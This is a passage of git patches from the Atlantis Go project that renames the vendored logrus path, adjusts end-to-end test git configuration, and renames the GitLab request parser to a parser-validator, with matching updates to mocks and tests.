-		return p
-	}
-	return filepath.Clean(p)
-}
-
-func validateStat(fi os.FileInfo) error {
-	if !fi.IsDir() {
-		return fmt.Errorf("source path must be a directory")
-	}
-	return nil
-}

From 182471742cffd4988aaa8dab8172ea81c1ee12cf Mon Sep 17 00:00:00 2001
From: Luke Kysow <lkysow@gmail.com>
Date: Wed, 20 Jun 2018 11:49:59 +0100
Subject: [PATCH 34/69] Use correct case for sirupsen.

---
 vendor/github.com/{Sirupsen => sirupsen}/logrus/.gitignore        | 0
 vendor/github.com/{Sirupsen => sirupsen}/logrus/.travis.yml       | 0
 vendor/github.com/{Sirupsen => sirupsen}/logrus/CHANGELOG.md      | 0
 vendor/github.com/{Sirupsen => sirupsen}/logrus/LICENSE           | 0
 vendor/github.com/{Sirupsen => sirupsen}/logrus/README.md         | 0
 vendor/github.com/{Sirupsen => sirupsen}/logrus/alt_exit.go       | 0
 vendor/github.com/{Sirupsen => sirupsen}/logrus/alt_exit_test.go  | 0
 vendor/github.com/{Sirupsen => sirupsen}/logrus/appveyor.yml      | 0
 vendor/github.com/{Sirupsen => sirupsen}/logrus/doc.go            | 0
 vendor/github.com/{Sirupsen => sirupsen}/logrus/entry.go          | 0
 vendor/github.com/{Sirupsen => sirupsen}/logrus/entry_test.go     | 0
 .../{Sirupsen => sirupsen}/logrus/example_basic_test.go           | 0
 .../github.com/{Sirupsen => sirupsen}/logrus/example_hook_test.go | 0
 vendor/github.com/{Sirupsen => sirupsen}/logrus/exported.go       | 0
 vendor/github.com/{Sirupsen => sirupsen}/logrus/formatter.go      | 0
 .../{Sirupsen => sirupsen}/logrus/formatter_bench_test.go         | 0
 vendor/github.com/{Sirupsen => sirupsen}/logrus/hook_test.go      | 0
 vendor/github.com/{Sirupsen => sirupsen}/logrus/hooks.go          | 0
 .../{Sirupsen => sirupsen}/logrus/hooks/syslog/README.md          | 0
 .../{Sirupsen => sirupsen}/logrus/hooks/syslog/syslog.go          | 0
 .../{Sirupsen => sirupsen}/logrus/hooks/syslog/syslog_test.go     | 0
 .../github.com/{Sirupsen => sirupsen}/logrus/hooks/test/test.go   | 0
 .../{Sirupsen => sirupsen}/logrus/hooks/test/test_test.go         | 0
 vendor/github.com/{Sirupsen => sirupsen}/logrus/json_formatter.go | 0
 .../{Sirupsen => sirupsen}/logrus/json_formatter_test.go          | 0
 vendor/github.com/{Sirupsen => sirupsen}/logrus/logger.go         | 0
 .../github.com/{Sirupsen => sirupsen}/logrus/logger_bench_test.go | 0
 vendor/github.com/{Sirupsen => sirupsen}/logrus/logrus.go         | 0
 vendor/github.com/{Sirupsen => sirupsen}/logrus/logrus_test.go    | 0
 vendor/github.com/{Sirupsen => sirupsen}/logrus/terminal_bsd.go   | 0
 .../{Sirupsen => sirupsen}/logrus/terminal_check_appengine.go     | 0
 .../{Sirupsen => sirupsen}/logrus/terminal_check_notappengine.go  | 0
 vendor/github.com/{Sirupsen => sirupsen}/logrus/terminal_linux.go | 0
 vendor/github.com/{Sirupsen => sirupsen}/logrus/text_formatter.go | 0
 .../{Sirupsen => sirupsen}/logrus/text_formatter_test.go          | 0
 vendor/github.com/{Sirupsen => sirupsen}/logrus/writer.go         | 0
 36 files changed, 0 insertions(+), 0 deletions(-)
 rename vendor/github.com/{Sirupsen => sirupsen}/logrus/.gitignore (100%)
 rename vendor/github.com/{Sirupsen => sirupsen}/logrus/.travis.yml (100%)
 rename vendor/github.com/{Sirupsen => sirupsen}/logrus/CHANGELOG.md (100%)
 rename vendor/github.com/{Sirupsen => sirupsen}/logrus/LICENSE (100%)
 rename vendor/github.com/{Sirupsen => sirupsen}/logrus/README.md (100%)
 rename vendor/github.com/{Sirupsen => sirupsen}/logrus/alt_exit.go (100%)
 rename vendor/github.com/{Sirupsen => sirupsen}/logrus/alt_exit_test.go (100%)
 rename vendor/github.com/{Sirupsen => sirupsen}/logrus/appveyor.yml (100%)
 rename vendor/github.com/{Sirupsen => sirupsen}/logrus/doc.go (100%)
 rename vendor/github.com/{Sirupsen => sirupsen}/logrus/entry.go (100%)
 rename vendor/github.com/{Sirupsen => sirupsen}/logrus/entry_test.go (100%)
 rename vendor/github.com/{Sirupsen => sirupsen}/logrus/example_basic_test.go (100%)
 rename vendor/github.com/{Sirupsen => sirupsen}/logrus/example_hook_test.go (100%)
 rename vendor/github.com/{Sirupsen => sirupsen}/logrus/exported.go (100%)
 rename vendor/github.com/{Sirupsen => sirupsen}/logrus/formatter.go (100%)
 rename vendor/github.com/{Sirupsen => sirupsen}/logrus/formatter_bench_test.go (100%)
 rename vendor/github.com/{Sirupsen => sirupsen}/logrus/hook_test.go (100%)
 rename vendor/github.com/{Sirupsen => sirupsen}/logrus/hooks.go (100%)
 rename vendor/github.com/{Sirupsen => sirupsen}/logrus/hooks/syslog/README.md (100%)
 rename vendor/github.com/{Sirupsen => sirupsen}/logrus/hooks/syslog/syslog.go (100%)
 rename vendor/github.com/{Sirupsen => sirupsen}/logrus/hooks/syslog/syslog_test.go (100%)
 rename vendor/github.com/{Sirupsen => sirupsen}/logrus/hooks/test/test.go (100%)
 rename vendor/github.com/{Sirupsen => sirupsen}/logrus/hooks/test/test_test.go (100%)
 rename vendor/github.com/{Sirupsen => sirupsen}/logrus/json_formatter.go (100%)
 rename vendor/github.com/{Sirupsen => sirupsen}/logrus/json_formatter_test.go (100%)
 rename vendor/github.com/{Sirupsen => sirupsen}/logrus/logger.go (100%)
 rename vendor/github.com/{Sirupsen => sirupsen}/logrus/logger_bench_test.go (100%)
 rename vendor/github.com/{Sirupsen => sirupsen}/logrus/logrus.go (100%)
 rename vendor/github.com/{Sirupsen => sirupsen}/logrus/logrus_test.go (100%)
 rename vendor/github.com/{Sirupsen => sirupsen}/logrus/terminal_bsd.go (100%)
 rename vendor/github.com/{Sirupsen => sirupsen}/logrus/terminal_check_appengine.go (100%)
 rename vendor/github.com/{Sirupsen => sirupsen}/logrus/terminal_check_notappengine.go (100%)
 rename vendor/github.com/{Sirupsen => sirupsen}/logrus/terminal_linux.go (100%)
 rename vendor/github.com/{Sirupsen => sirupsen}/logrus/text_formatter.go (100%)
 rename vendor/github.com/{Sirupsen => sirupsen}/logrus/text_formatter_test.go (100%)
 rename vendor/github.com/{Sirupsen => sirupsen}/logrus/writer.go (100%)

diff --git a/vendor/github.com/Sirupsen/logrus/.gitignore b/vendor/github.com/sirupsen/logrus/.gitignore
similarity index 100%
rename from vendor/github.com/Sirupsen/logrus/.gitignore
rename to vendor/github.com/sirupsen/logrus/.gitignore
diff --git a/vendor/github.com/Sirupsen/logrus/.travis.yml b/vendor/github.com/sirupsen/logrus/.travis.yml
similarity index 100%
rename from vendor/github.com/Sirupsen/logrus/.travis.yml
rename to vendor/github.com/sirupsen/logrus/.travis.yml
diff --git a/vendor/github.com/Sirupsen/logrus/CHANGELOG.md b/vendor/github.com/sirupsen/logrus/CHANGELOG.md
similarity index 100%
rename from vendor/github.com/Sirupsen/logrus/CHANGELOG.md
rename to vendor/github.com/sirupsen/logrus/CHANGELOG.md
diff --git a/vendor/github.com/Sirupsen/logrus/LICENSE b/vendor/github.com/sirupsen/logrus/LICENSE
similarity index 100%
rename from vendor/github.com/Sirupsen/logrus/LICENSE
rename to vendor/github.com/sirupsen/logrus/LICENSE
diff --git a/vendor/github.com/Sirupsen/logrus/README.md b/vendor/github.com/sirupsen/logrus/README.md
similarity index 100%
rename from vendor/github.com/Sirupsen/logrus/README.md
rename to vendor/github.com/sirupsen/logrus/README.md
diff --git a/vendor/github.com/Sirupsen/logrus/alt_exit.go b/vendor/github.com/sirupsen/logrus/alt_exit.go
similarity index 100%
rename from vendor/github.com/Sirupsen/logrus/alt_exit.go
rename to vendor/github.com/sirupsen/logrus/alt_exit.go
diff --git a/vendor/github.com/Sirupsen/logrus/alt_exit_test.go b/vendor/github.com/sirupsen/logrus/alt_exit_test.go
similarity index 100%
rename from vendor/github.com/Sirupsen/logrus/alt_exit_test.go
rename to vendor/github.com/sirupsen/logrus/alt_exit_test.go
diff --git a/vendor/github.com/Sirupsen/logrus/appveyor.yml b/vendor/github.com/sirupsen/logrus/appveyor.yml
similarity index 100%
rename from vendor/github.com/Sirupsen/logrus/appveyor.yml
rename to vendor/github.com/sirupsen/logrus/appveyor.yml
diff --git a/vendor/github.com/Sirupsen/logrus/doc.go b/vendor/github.com/sirupsen/logrus/doc.go
similarity index 100%
rename from vendor/github.com/Sirupsen/logrus/doc.go
rename to vendor/github.com/sirupsen/logrus/doc.go
diff --git a/vendor/github.com/Sirupsen/logrus/entry.go b/vendor/github.com/sirupsen/logrus/entry.go
similarity index 100%
rename from vendor/github.com/Sirupsen/logrus/entry.go
rename to vendor/github.com/sirupsen/logrus/entry.go
diff --git a/vendor/github.com/Sirupsen/logrus/entry_test.go b/vendor/github.com/sirupsen/logrus/entry_test.go
similarity index 100%
rename from vendor/github.com/Sirupsen/logrus/entry_test.go
rename to vendor/github.com/sirupsen/logrus/entry_test.go
diff --git a/vendor/github.com/Sirupsen/logrus/example_basic_test.go b/vendor/github.com/sirupsen/logrus/example_basic_test.go
similarity index 100%
rename from vendor/github.com/Sirupsen/logrus/example_basic_test.go
rename to vendor/github.com/sirupsen/logrus/example_basic_test.go
diff --git a/vendor/github.com/Sirupsen/logrus/example_hook_test.go b/vendor/github.com/sirupsen/logrus/example_hook_test.go
similarity index 100%
rename from vendor/github.com/Sirupsen/logrus/example_hook_test.go
rename to vendor/github.com/sirupsen/logrus/example_hook_test.go
diff --git a/vendor/github.com/Sirupsen/logrus/exported.go b/vendor/github.com/sirupsen/logrus/exported.go
similarity index 100%
rename from vendor/github.com/Sirupsen/logrus/exported.go
rename to vendor/github.com/sirupsen/logrus/exported.go
diff --git a/vendor/github.com/Sirupsen/logrus/formatter.go b/vendor/github.com/sirupsen/logrus/formatter.go
similarity index 100%
rename from vendor/github.com/Sirupsen/logrus/formatter.go
rename to vendor/github.com/sirupsen/logrus/formatter.go
diff --git a/vendor/github.com/Sirupsen/logrus/formatter_bench_test.go b/vendor/github.com/sirupsen/logrus/formatter_bench_test.go
similarity index 100%
rename from vendor/github.com/Sirupsen/logrus/formatter_bench_test.go
rename to vendor/github.com/sirupsen/logrus/formatter_bench_test.go
diff --git a/vendor/github.com/Sirupsen/logrus/hook_test.go b/vendor/github.com/sirupsen/logrus/hook_test.go
similarity index 100%
rename from vendor/github.com/Sirupsen/logrus/hook_test.go
rename to vendor/github.com/sirupsen/logrus/hook_test.go
diff --git a/vendor/github.com/Sirupsen/logrus/hooks.go b/vendor/github.com/sirupsen/logrus/hooks.go
similarity index 100%
rename from vendor/github.com/Sirupsen/logrus/hooks.go
rename to vendor/github.com/sirupsen/logrus/hooks.go
diff --git a/vendor/github.com/Sirupsen/logrus/hooks/syslog/README.md b/vendor/github.com/sirupsen/logrus/hooks/syslog/README.md
similarity index 100%
rename from vendor/github.com/Sirupsen/logrus/hooks/syslog/README.md
rename to vendor/github.com/sirupsen/logrus/hooks/syslog/README.md
diff --git a/vendor/github.com/Sirupsen/logrus/hooks/syslog/syslog.go b/vendor/github.com/sirupsen/logrus/hooks/syslog/syslog.go
similarity index 100%
rename from vendor/github.com/Sirupsen/logrus/hooks/syslog/syslog.go
rename to vendor/github.com/sirupsen/logrus/hooks/syslog/syslog.go
diff --git a/vendor/github.com/Sirupsen/logrus/hooks/syslog/syslog_test.go b/vendor/github.com/sirupsen/logrus/hooks/syslog/syslog_test.go
similarity index 100%
rename from vendor/github.com/Sirupsen/logrus/hooks/syslog/syslog_test.go
rename to vendor/github.com/sirupsen/logrus/hooks/syslog/syslog_test.go
diff --git a/vendor/github.com/Sirupsen/logrus/hooks/test/test.go b/vendor/github.com/sirupsen/logrus/hooks/test/test.go
similarity index 100%
rename from vendor/github.com/Sirupsen/logrus/hooks/test/test.go
rename to vendor/github.com/sirupsen/logrus/hooks/test/test.go
diff --git a/vendor/github.com/Sirupsen/logrus/hooks/test/test_test.go b/vendor/github.com/sirupsen/logrus/hooks/test/test_test.go
similarity index 100%
rename from vendor/github.com/Sirupsen/logrus/hooks/test/test_test.go
rename to vendor/github.com/sirupsen/logrus/hooks/test/test_test.go
diff --git a/vendor/github.com/Sirupsen/logrus/json_formatter.go b/vendor/github.com/sirupsen/logrus/json_formatter.go
similarity index 100%
rename from vendor/github.com/Sirupsen/logrus/json_formatter.go
rename to vendor/github.com/sirupsen/logrus/json_formatter.go
diff --git a/vendor/github.com/Sirupsen/logrus/json_formatter_test.go b/vendor/github.com/sirupsen/logrus/json_formatter_test.go
similarity index 100%
rename from vendor/github.com/Sirupsen/logrus/json_formatter_test.go
rename to vendor/github.com/sirupsen/logrus/json_formatter_test.go
diff --git a/vendor/github.com/Sirupsen/logrus/logger.go b/vendor/github.com/sirupsen/logrus/logger.go
similarity index 100%
rename from vendor/github.com/Sirupsen/logrus/logger.go
rename to vendor/github.com/sirupsen/logrus/logger.go
diff --git a/vendor/github.com/Sirupsen/logrus/logger_bench_test.go b/vendor/github.com/sirupsen/logrus/logger_bench_test.go
similarity index 100%
rename from vendor/github.com/Sirupsen/logrus/logger_bench_test.go
rename to vendor/github.com/sirupsen/logrus/logger_bench_test.go
diff --git a/vendor/github.com/Sirupsen/logrus/logrus.go b/vendor/github.com/sirupsen/logrus/logrus.go
similarity index 100%
rename from vendor/github.com/Sirupsen/logrus/logrus.go
rename to vendor/github.com/sirupsen/logrus/logrus.go
diff --git a/vendor/github.com/Sirupsen/logrus/logrus_test.go b/vendor/github.com/sirupsen/logrus/logrus_test.go
similarity index 100%
rename from vendor/github.com/Sirupsen/logrus/logrus_test.go
rename to vendor/github.com/sirupsen/logrus/logrus_test.go
diff --git a/vendor/github.com/Sirupsen/logrus/terminal_bsd.go b/vendor/github.com/sirupsen/logrus/terminal_bsd.go
similarity index 100%
rename from vendor/github.com/Sirupsen/logrus/terminal_bsd.go
rename to vendor/github.com/sirupsen/logrus/terminal_bsd.go
diff --git a/vendor/github.com/Sirupsen/logrus/terminal_check_appengine.go b/vendor/github.com/sirupsen/logrus/terminal_check_appengine.go
similarity index 100%
rename from vendor/github.com/Sirupsen/logrus/terminal_check_appengine.go
rename to vendor/github.com/sirupsen/logrus/terminal_check_appengine.go
diff --git a/vendor/github.com/Sirupsen/logrus/terminal_check_notappengine.go b/vendor/github.com/sirupsen/logrus/terminal_check_notappengine.go
similarity index 100%
rename from vendor/github.com/Sirupsen/logrus/terminal_check_notappengine.go
rename to vendor/github.com/sirupsen/logrus/terminal_check_notappengine.go
diff --git a/vendor/github.com/Sirupsen/logrus/terminal_linux.go b/vendor/github.com/sirupsen/logrus/terminal_linux.go
similarity index 100%
rename from vendor/github.com/Sirupsen/logrus/terminal_linux.go
rename to vendor/github.com/sirupsen/logrus/terminal_linux.go
diff --git a/vendor/github.com/Sirupsen/logrus/text_formatter.go b/vendor/github.com/sirupsen/logrus/text_formatter.go
similarity index 100%
rename from vendor/github.com/Sirupsen/logrus/text_formatter.go
rename to vendor/github.com/sirupsen/logrus/text_formatter.go
diff --git a/vendor/github.com/Sirupsen/logrus/text_formatter_test.go b/vendor/github.com/sirupsen/logrus/text_formatter_test.go
similarity index 100%
rename from vendor/github.com/Sirupsen/logrus/text_formatter_test.go
rename to vendor/github.com/sirupsen/logrus/text_formatter_test.go
diff --git a/vendor/github.com/Sirupsen/logrus/writer.go b/vendor/github.com/sirupsen/logrus/writer.go
similarity index 100%
rename from vendor/github.com/Sirupsen/logrus/writer.go
rename to vendor/github.com/sirupsen/logrus/writer.go

From c6b18e383996a90e33c02776f187c59b65be2aae Mon Sep 17 00:00:00 2001
From: Luke Kysow <lkysow@gmail.com>
Date: Wed, 20 Jun 2018 11:58:10 +0100
Subject: [PATCH 35/69] Fix tests

---
 server/events_controller_e2e_test.go | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/server/events_controller_e2e_test.go b/server/events_controller_e2e_test.go
index 3853d1349b..6044b0163f 100644
--- a/server/events_controller_e2e_test.go
+++ b/server/events_controller_e2e_test.go
@@ -404,6 +404,8 @@ func initializeRepo(t *testing.T, repoDir string) (string, string, func()) {
 	runCmd(t, destDir, "git", "init")
 	runCmd(t, destDir, "touch", ".gitkeep")
 	runCmd(t, destDir, "git", "add", ".gitkeep")
+	runCmd(t, destDir, "git", "config", "--local", "user.email", "atlantisbot@runatlantis.io")
+	runCmd(t, destDir, "git", "config", "--local", "user.name", "atlantisbot")
 	runCmd(t, destDir, "git", "commit", "-m", "initial commit")
 	runCmd(t, destDir, "git", "checkout", "-b", "branch")
 	runCmd(t, destDir, "git", "add", ".")

From 856c0d0c728abfadb801e6e88d24b2aa209fbdab Mon Sep 17 00:00:00 2001
From: Luke Kysow <lkysow@gmail.com>
Date: Wed, 20 Jun 2018 12:19:16 +0100
Subject: [PATCH 36/69] Use atlantisbot

---
 e2e/.gitconfig | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/e2e/.gitconfig b/e2e/.gitconfig
index 43da800f32..3424a0e076 100644
--- a/e2e/.gitconfig
+++ b/e2e/.gitconfig
@@ -1,3 +1,3 @@
 [user]
-	name = Luke Kysow
+	name = atlantisbot
 	email = lkysow+atlantis@gmail.com
\ No newline at end of file

From c98d1040c584b2956bab67bb3f83558696301563 Mon Sep 17 00:00:00 2001
From: Luke Kysow <lkysow@gmail.com>
Date: Wed, 20 Jun 2018 12:42:25 +0100
Subject: [PATCH 37/69] Update e2e for new version.

---
 e2e/e2e.go  | 9 +--------
 e2e/main.go | 5 ++---
 2 files changed, 3 insertions(+), 11 deletions(-)

diff --git a/e2e/e2e.go b/e2e/e2e.go
index 041f240d7b..bf51830782 100644
--- a/e2e/e2e.go
+++ b/e2e/e2e.go
@@ -128,14 +128,7 @@ func (t *E2ETester) Start() (*E2EResult, error) {
 	// defer closing pull request and delete remote branch
 	defer cleanUp(t, pull.GetNumber(), branchName) // nolint: errcheck
 
-	// create run plan comment
-	log.Printf("creating plan comment: %q", t.projectType.PlanCommand)
-	_, _, err = t.githubClient.client.Issues.CreateComment(t.githubClient.ctx, t.ownerName, t.repoName, pull.GetNumber(), &github.IssueComment{Body: github.String(t.projectType.PlanCommand)})
-	if err != nil {
-		return e2eResult, fmt.Errorf("error creating 'run plan' comment on github")
-	}
-
-	// wait for atlantis to respond to webhook
+	// wait for atlantis to respond to webhook and autoplan.
 	time.Sleep(2 * time.Second)
 
 	state := "not started"
diff --git a/e2e/main.go b/e2e/main.go
index 0f1e9f274a..8513032415 100644
--- a/e2e/main.go
+++ b/e2e/main.go
@@ -27,13 +27,12 @@ import (
 
 var defaultAtlantisURL = "http://localhost:4141"
 var projectTypes = []Project{
-	{"standalone", "atlantis plan", "atlantis apply"},
-	{"standalone-with-workspace", "atlantis plan -w staging", "atlantis apply -w staging"},
+	{"standalone", "atlantis apply -d standalone"},
+	{"standalone-with-workspace", "atlantis apply -d standalone-with-workspace -w staging"},
 }
 
 type Project struct {
 	Name         string
-	PlanCommand  string
 	ApplyCommand string
 }
 

From 0c966d50e9b4e3d00cc2a8bfc24f2f653f1b10bb Mon Sep 17 00:00:00 2001
From: Luke Kysow <lkysow@gmail.com>
Date: Wed, 20 Jun 2018 15:11:44 +0100
Subject: [PATCH 38/69] GitlabRequestParser -> GitlabRequestParserValidator

---
 server/events_controller.go                   |  8 +-
 server/events_controller_e2e_test.go          | 14 ++--
 server/events_controller_test.go              | 52 ++++++------
 ....go => gitlab_request_parser_validator.go} | 22 ++---
 ...> gitlab_request_parser_validator_test.go} | 18 ++--
 server/mocks/mock_gitlab_request_parser.go    | 84 -------------------
 .../mock_gitlab_request_parser_validator.go   | 84 +++++++++++++++++++
 server/server.go                              | 28 +++----
 8 files changed, 155 insertions(+), 155 deletions(-)
 rename server/{gitlab_request_parser.go => gitlab_request_parser_validator.go} (74%)
 rename server/{gitlab_request_parser_test.go => gitlab_request_parser_validator_test.go} (96%)
 delete mode 100644 server/mocks/mock_gitlab_request_parser.go
 create mode 100644 server/mocks/mock_gitlab_request_parser_validator.go

diff --git a/server/events_controller.go b/server/events_controller.go
index a132b094c9..95faa70299 100644
--- a/server/events_controller.go
+++ b/server/events_controller.go
@@ -39,9 +39,9 @@ type EventsController struct {
 	// GithubWebHookSecret is the secret added to this webhook via the GitHub
 	// UI that identifies this call as coming from GitHub. If empty, no
 	// request validation is done.
-	GithubWebHookSecret    []byte
-	GithubRequestValidator GithubRequestValidator
-	GitlabRequestParser    GitlabRequestParser
+	GithubWebHookSecret          []byte
+	GithubRequestValidator       GithubRequestValidator
+	GitlabRequestParserValidator GitlabRequestParserValidator
 	// GitlabWebHookSecret is the secret added to this webhook via the GitLab
 	// UI that identifies this call as coming from GitLab. If empty, no
 	// request validation is done.
@@ -208,7 +208,7 @@ func (e *EventsController) handlePullRequestEvent(w http.ResponseWriter, baseRep
 }
 
 func (e *EventsController) handleGitlabPost(w http.ResponseWriter, r *http.Request) {
-	event, err := e.GitlabRequestParser.Validate(r, e.GitlabWebHookSecret)
+	event, err := e.GitlabRequestParserValidator.ParseAndValidate(r, e.GitlabWebHookSecret)
 	if err != nil {
 		e.respond(w, logging.Warn, http.StatusBadRequest, err.Error())
 		return
diff --git a/server/events_controller_e2e_test.go b/server/events_controller_e2e_test.go
index 6044b0163f..f1dc0958fa 100644
--- a/server/events_controller_e2e_test.go
+++ b/server/events_controller_e2e_test.go
@@ -286,13 +286,13 @@ func setupE2E(t *testing.T) (server.EventsController, *vcsmocks.MockClientProxy,
 			VCSClient: e2eVCSClient,
 			Workspace: atlantisWorkspace,
 		},
-		Logger:                 logger,
-		Parser:                 eventParser,
-		CommentParser:          commentParser,
-		GithubWebHookSecret:    nil,
-		GithubRequestValidator: &server.DefaultGithubRequestValidator{},
-		GitlabRequestParser:    &server.DefaultGitlabRequestParser{},
-		GitlabWebHookSecret:    nil,
+		Logger:                       logger,
+		Parser:                       eventParser,
+		CommentParser:                commentParser,
+		GithubWebHookSecret:          nil,
+		GithubRequestValidator:       &server.DefaultGithubRequestValidator{},
+		GitlabRequestParserValidator: &server.DefaultGitlabRequestParserValidator{},
+		GitlabWebHookSecret:          nil,
 		RepoWhitelist: &events.RepoWhitelist{
 			Whitelist: "*",
 		},
diff --git a/server/events_controller_test.go b/server/events_controller_test.go
index bb0682ba6f..9d35a22655 100644
--- a/server/events_controller_test.go
+++ b/server/events_controller_test.go
@@ -90,7 +90,7 @@ func TestPost_InvalidGitlabSecret(t *testing.T) {
 	w := httptest.NewRecorder()
 	req, _ := http.NewRequest("GET", "", bytes.NewBuffer(nil))
 	req.Header.Set(gitlabHeader, "value")
-	When(gl.Validate(req, secret)).ThenReturn(nil, errors.New("err"))
+	When(gl.ParseAndValidate(req, secret)).ThenReturn(nil, errors.New("err"))
 	e.Post(w, req)
 	responseContains(t, w, http.StatusBadRequest, "err")
 }
@@ -112,7 +112,7 @@ func TestPost_UnsupportedGitlabEvent(t *testing.T) {
 	w := httptest.NewRecorder()
 	req, _ := http.NewRequest("GET", "", bytes.NewBuffer(nil))
 	req.Header.Set(gitlabHeader, "value")
-	When(gl.Validate(req, secret)).ThenReturn([]byte(`{"not an event": ""}`), nil)
+	When(gl.ParseAndValidate(req, secret)).ThenReturn([]byte(`{"not an event": ""}`), nil)
 	e.Post(w, req)
 	responseContains(t, w, http.StatusOK, "Ignoring unsupported event")
 }
@@ -148,7 +148,7 @@ func TestPost_GitlabCommentInvalidCommand(t *testing.T) {
 	e, _, gl, _, _, _, _, cp := setup(t)
 	req, _ := http.NewRequest("GET", "", bytes.NewBuffer(nil))
 	req.Header.Set(gitlabHeader, "value")
-	When(gl.Validate(req, secret)).ThenReturn(gitlab.MergeCommentEvent{}, nil)
+	When(gl.ParseAndValidate(req, secret)).ThenReturn(gitlab.MergeCommentEvent{}, nil)
 	When(cp.Parse("", models.Gitlab)).ThenReturn(events.CommentParseResult{Ignore: true})
 	w := httptest.NewRecorder()
 	e.Post(w, req)
@@ -174,13 +174,13 @@ func TestPost_GitlabCommentNotWhitelisted(t *testing.T) {
 	RegisterMockTestingT(t)
 	vcsClient := vcsmocks.NewMockClientProxy()
 	e := server.EventsController{
-		Logger:              logging.NewNoopLogger(),
-		CommentParser:       &events.CommentParser{},
-		GitlabRequestParser: &server.DefaultGitlabRequestParser{},
-		Parser:              &events.EventParser{},
-		SupportedVCSHosts:   []models.VCSHostType{models.Gitlab},
-		RepoWhitelist:       &events.RepoWhitelist{},
-		VCSClient:           vcsClient,
+		Logger:                       logging.NewNoopLogger(),
+		CommentParser:                &events.CommentParser{},
+		GitlabRequestParserValidator: &server.DefaultGitlabRequestParserValidator{},
+		Parser:            &events.EventParser{},
+		SupportedVCSHosts: []models.VCSHostType{models.Gitlab},
+		RepoWhitelist:     &events.RepoWhitelist{},
+		VCSClient:         vcsClient,
 	}
 	requestJSON, err := ioutil.ReadFile(filepath.Join("testfixtures", "gitlabMergeCommentEvent_notWhitelisted.json"))
 	Ok(t, err)
@@ -231,7 +231,7 @@ func TestPost_GitlabCommentResponse(t *testing.T) {
 	e, _, gl, _, _, _, vcsClient, cp := setup(t)
 	req, _ := http.NewRequest("GET", "", bytes.NewBuffer(nil))
 	req.Header.Set(gitlabHeader, "value")
-	When(gl.Validate(req, secret)).ThenReturn(gitlab.MergeCommentEvent{}, nil)
+	When(gl.ParseAndValidate(req, secret)).ThenReturn(gitlab.MergeCommentEvent{}, nil)
 	When(cp.Parse("", models.Gitlab)).ThenReturn(events.CommentParseResult{CommentResponse: "a comment"})
 	w := httptest.NewRecorder()
 	e.Post(w, req)
@@ -262,7 +262,7 @@ func TestPost_GitlabCommentSuccess(t *testing.T) {
 	e, _, gl, _, cr, _, _, _ := setup(t)
 	req, _ := http.NewRequest("GET", "", bytes.NewBuffer(nil))
 	req.Header.Set(gitlabHeader, "value")
-	When(gl.Validate(req, secret)).ThenReturn(gitlab.MergeCommentEvent{}, nil)
+	When(gl.ParseAndValidate(req, secret)).ThenReturn(gitlab.MergeCommentEvent{}, nil)
 	w := httptest.NewRecorder()
 	e.Post(w, req)
 	responseContains(t, w, http.StatusOK, "Processing...")
@@ -362,7 +362,7 @@ func TestPost_GitlabMergeRequestErrCleaningPull(t *testing.T) {
 	e, _, gl, p, _, c, _, _ := setup(t)
 	req, _ := http.NewRequest("GET", "", bytes.NewBuffer(nil))
 	req.Header.Set(gitlabHeader, "value")
-	When(gl.Validate(req, secret)).ThenReturn(gitlabMergeEvent, nil)
+	When(gl.ParseAndValidate(req, secret)).ThenReturn(gitlabMergeEvent, nil)
 	repo := models.Repo{}
 	pullRequest := models.PullRequest{State: models.Closed}
 	When(p.ParseGitlabMergeEvent(gitlabMergeEvent)).ThenReturn(pullRequest, repo, repo, nil)
@@ -395,7 +395,7 @@ func TestPost_GitlabMergeRequestSuccess(t *testing.T) {
 	e, _, gl, p, _, _, _, _ := setup(t)
 	req, _ := http.NewRequest("GET", "", bytes.NewBuffer(nil))
 	req.Header.Set(gitlabHeader, "value")
-	When(gl.Validate(req, secret)).ThenReturn(gitlabMergeEvent, nil)
+	When(gl.ParseAndValidate(req, secret)).ThenReturn(gitlabMergeEvent, nil)
 	repo := models.Repo{}
 	pullRequest := models.PullRequest{State: models.Closed}
 	When(p.ParseGitlabMergeEvent(gitlabMergeEvent)).ThenReturn(pullRequest, repo, repo, nil)
@@ -404,26 +404,26 @@ func TestPost_GitlabMergeRequestSuccess(t *testing.T) {
 	responseContains(t, w, http.StatusOK, "Pull request cleaned successfully")
 }
 
-func setup(t *testing.T) (server.EventsController, *mocks.MockGithubRequestValidator, *mocks.MockGitlabRequestParser, *emocks.MockEventParsing, *emocks.MockCommandRunner, *emocks.MockPullCleaner, *vcsmocks.MockClientProxy, *emocks.MockCommentParsing) {
+func setup(t *testing.T) (server.EventsController, *mocks.MockGithubRequestValidator, *mocks.MockGitlabRequestParserValidator, *emocks.MockEventParsing, *emocks.MockCommandRunner, *emocks.MockPullCleaner, *vcsmocks.MockClientProxy, *emocks.MockCommentParsing) {
 	RegisterMockTestingT(t)
 	v := mocks.NewMockGithubRequestValidator()
-	gl := mocks.NewMockGitlabRequestParser()
+	gl := mocks.NewMockGitlabRequestParserValidator()
 	p := emocks.NewMockEventParsing()
 	cp := emocks.NewMockCommentParsing()
 	cr := emocks.NewMockCommandRunner()
 	c := emocks.NewMockPullCleaner()
 	vcsmock := vcsmocks.NewMockClientProxy()
 	e := server.EventsController{
-		Logger:                 logging.NewNoopLogger(),
-		GithubRequestValidator: v,
-		Parser:                 p,
-		CommentParser:          cp,
-		CommandRunner:          cr,
-		PullCleaner:            c,
-		GithubWebHookSecret:    secret,
-		SupportedVCSHosts:      []models.VCSHostType{models.Github, models.Gitlab},
-		GitlabWebHookSecret:    secret,
-		GitlabRequestParser:    gl,
+		Logger:                       logging.NewNoopLogger(),
+		GithubRequestValidator:       v,
+		Parser:                       p,
+		CommentParser:                cp,
+		CommandRunner:                cr,
+		PullCleaner:                  c,
+		GithubWebHookSecret:          secret,
+		SupportedVCSHosts:            []models.VCSHostType{models.Github, models.Gitlab},
+		GitlabWebHookSecret:          secret,
+		GitlabRequestParserValidator: gl,
 		RepoWhitelist: &events.RepoWhitelist{
 			Whitelist: "*",
 		},
diff --git a/server/gitlab_request_parser.go b/server/gitlab_request_parser_validator.go
similarity index 74%
rename from server/gitlab_request_parser.go
rename to server/gitlab_request_parser_validator.go
index 94ab4ddd5a..ee486248f9 100644
--- a/server/gitlab_request_parser.go
+++ b/server/gitlab_request_parser_validator.go
@@ -24,18 +24,18 @@ import (
 
 const secretHeader = "X-Gitlab-Token" // #nosec
 
-//go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_gitlab_request_parser.go GitlabRequestParser
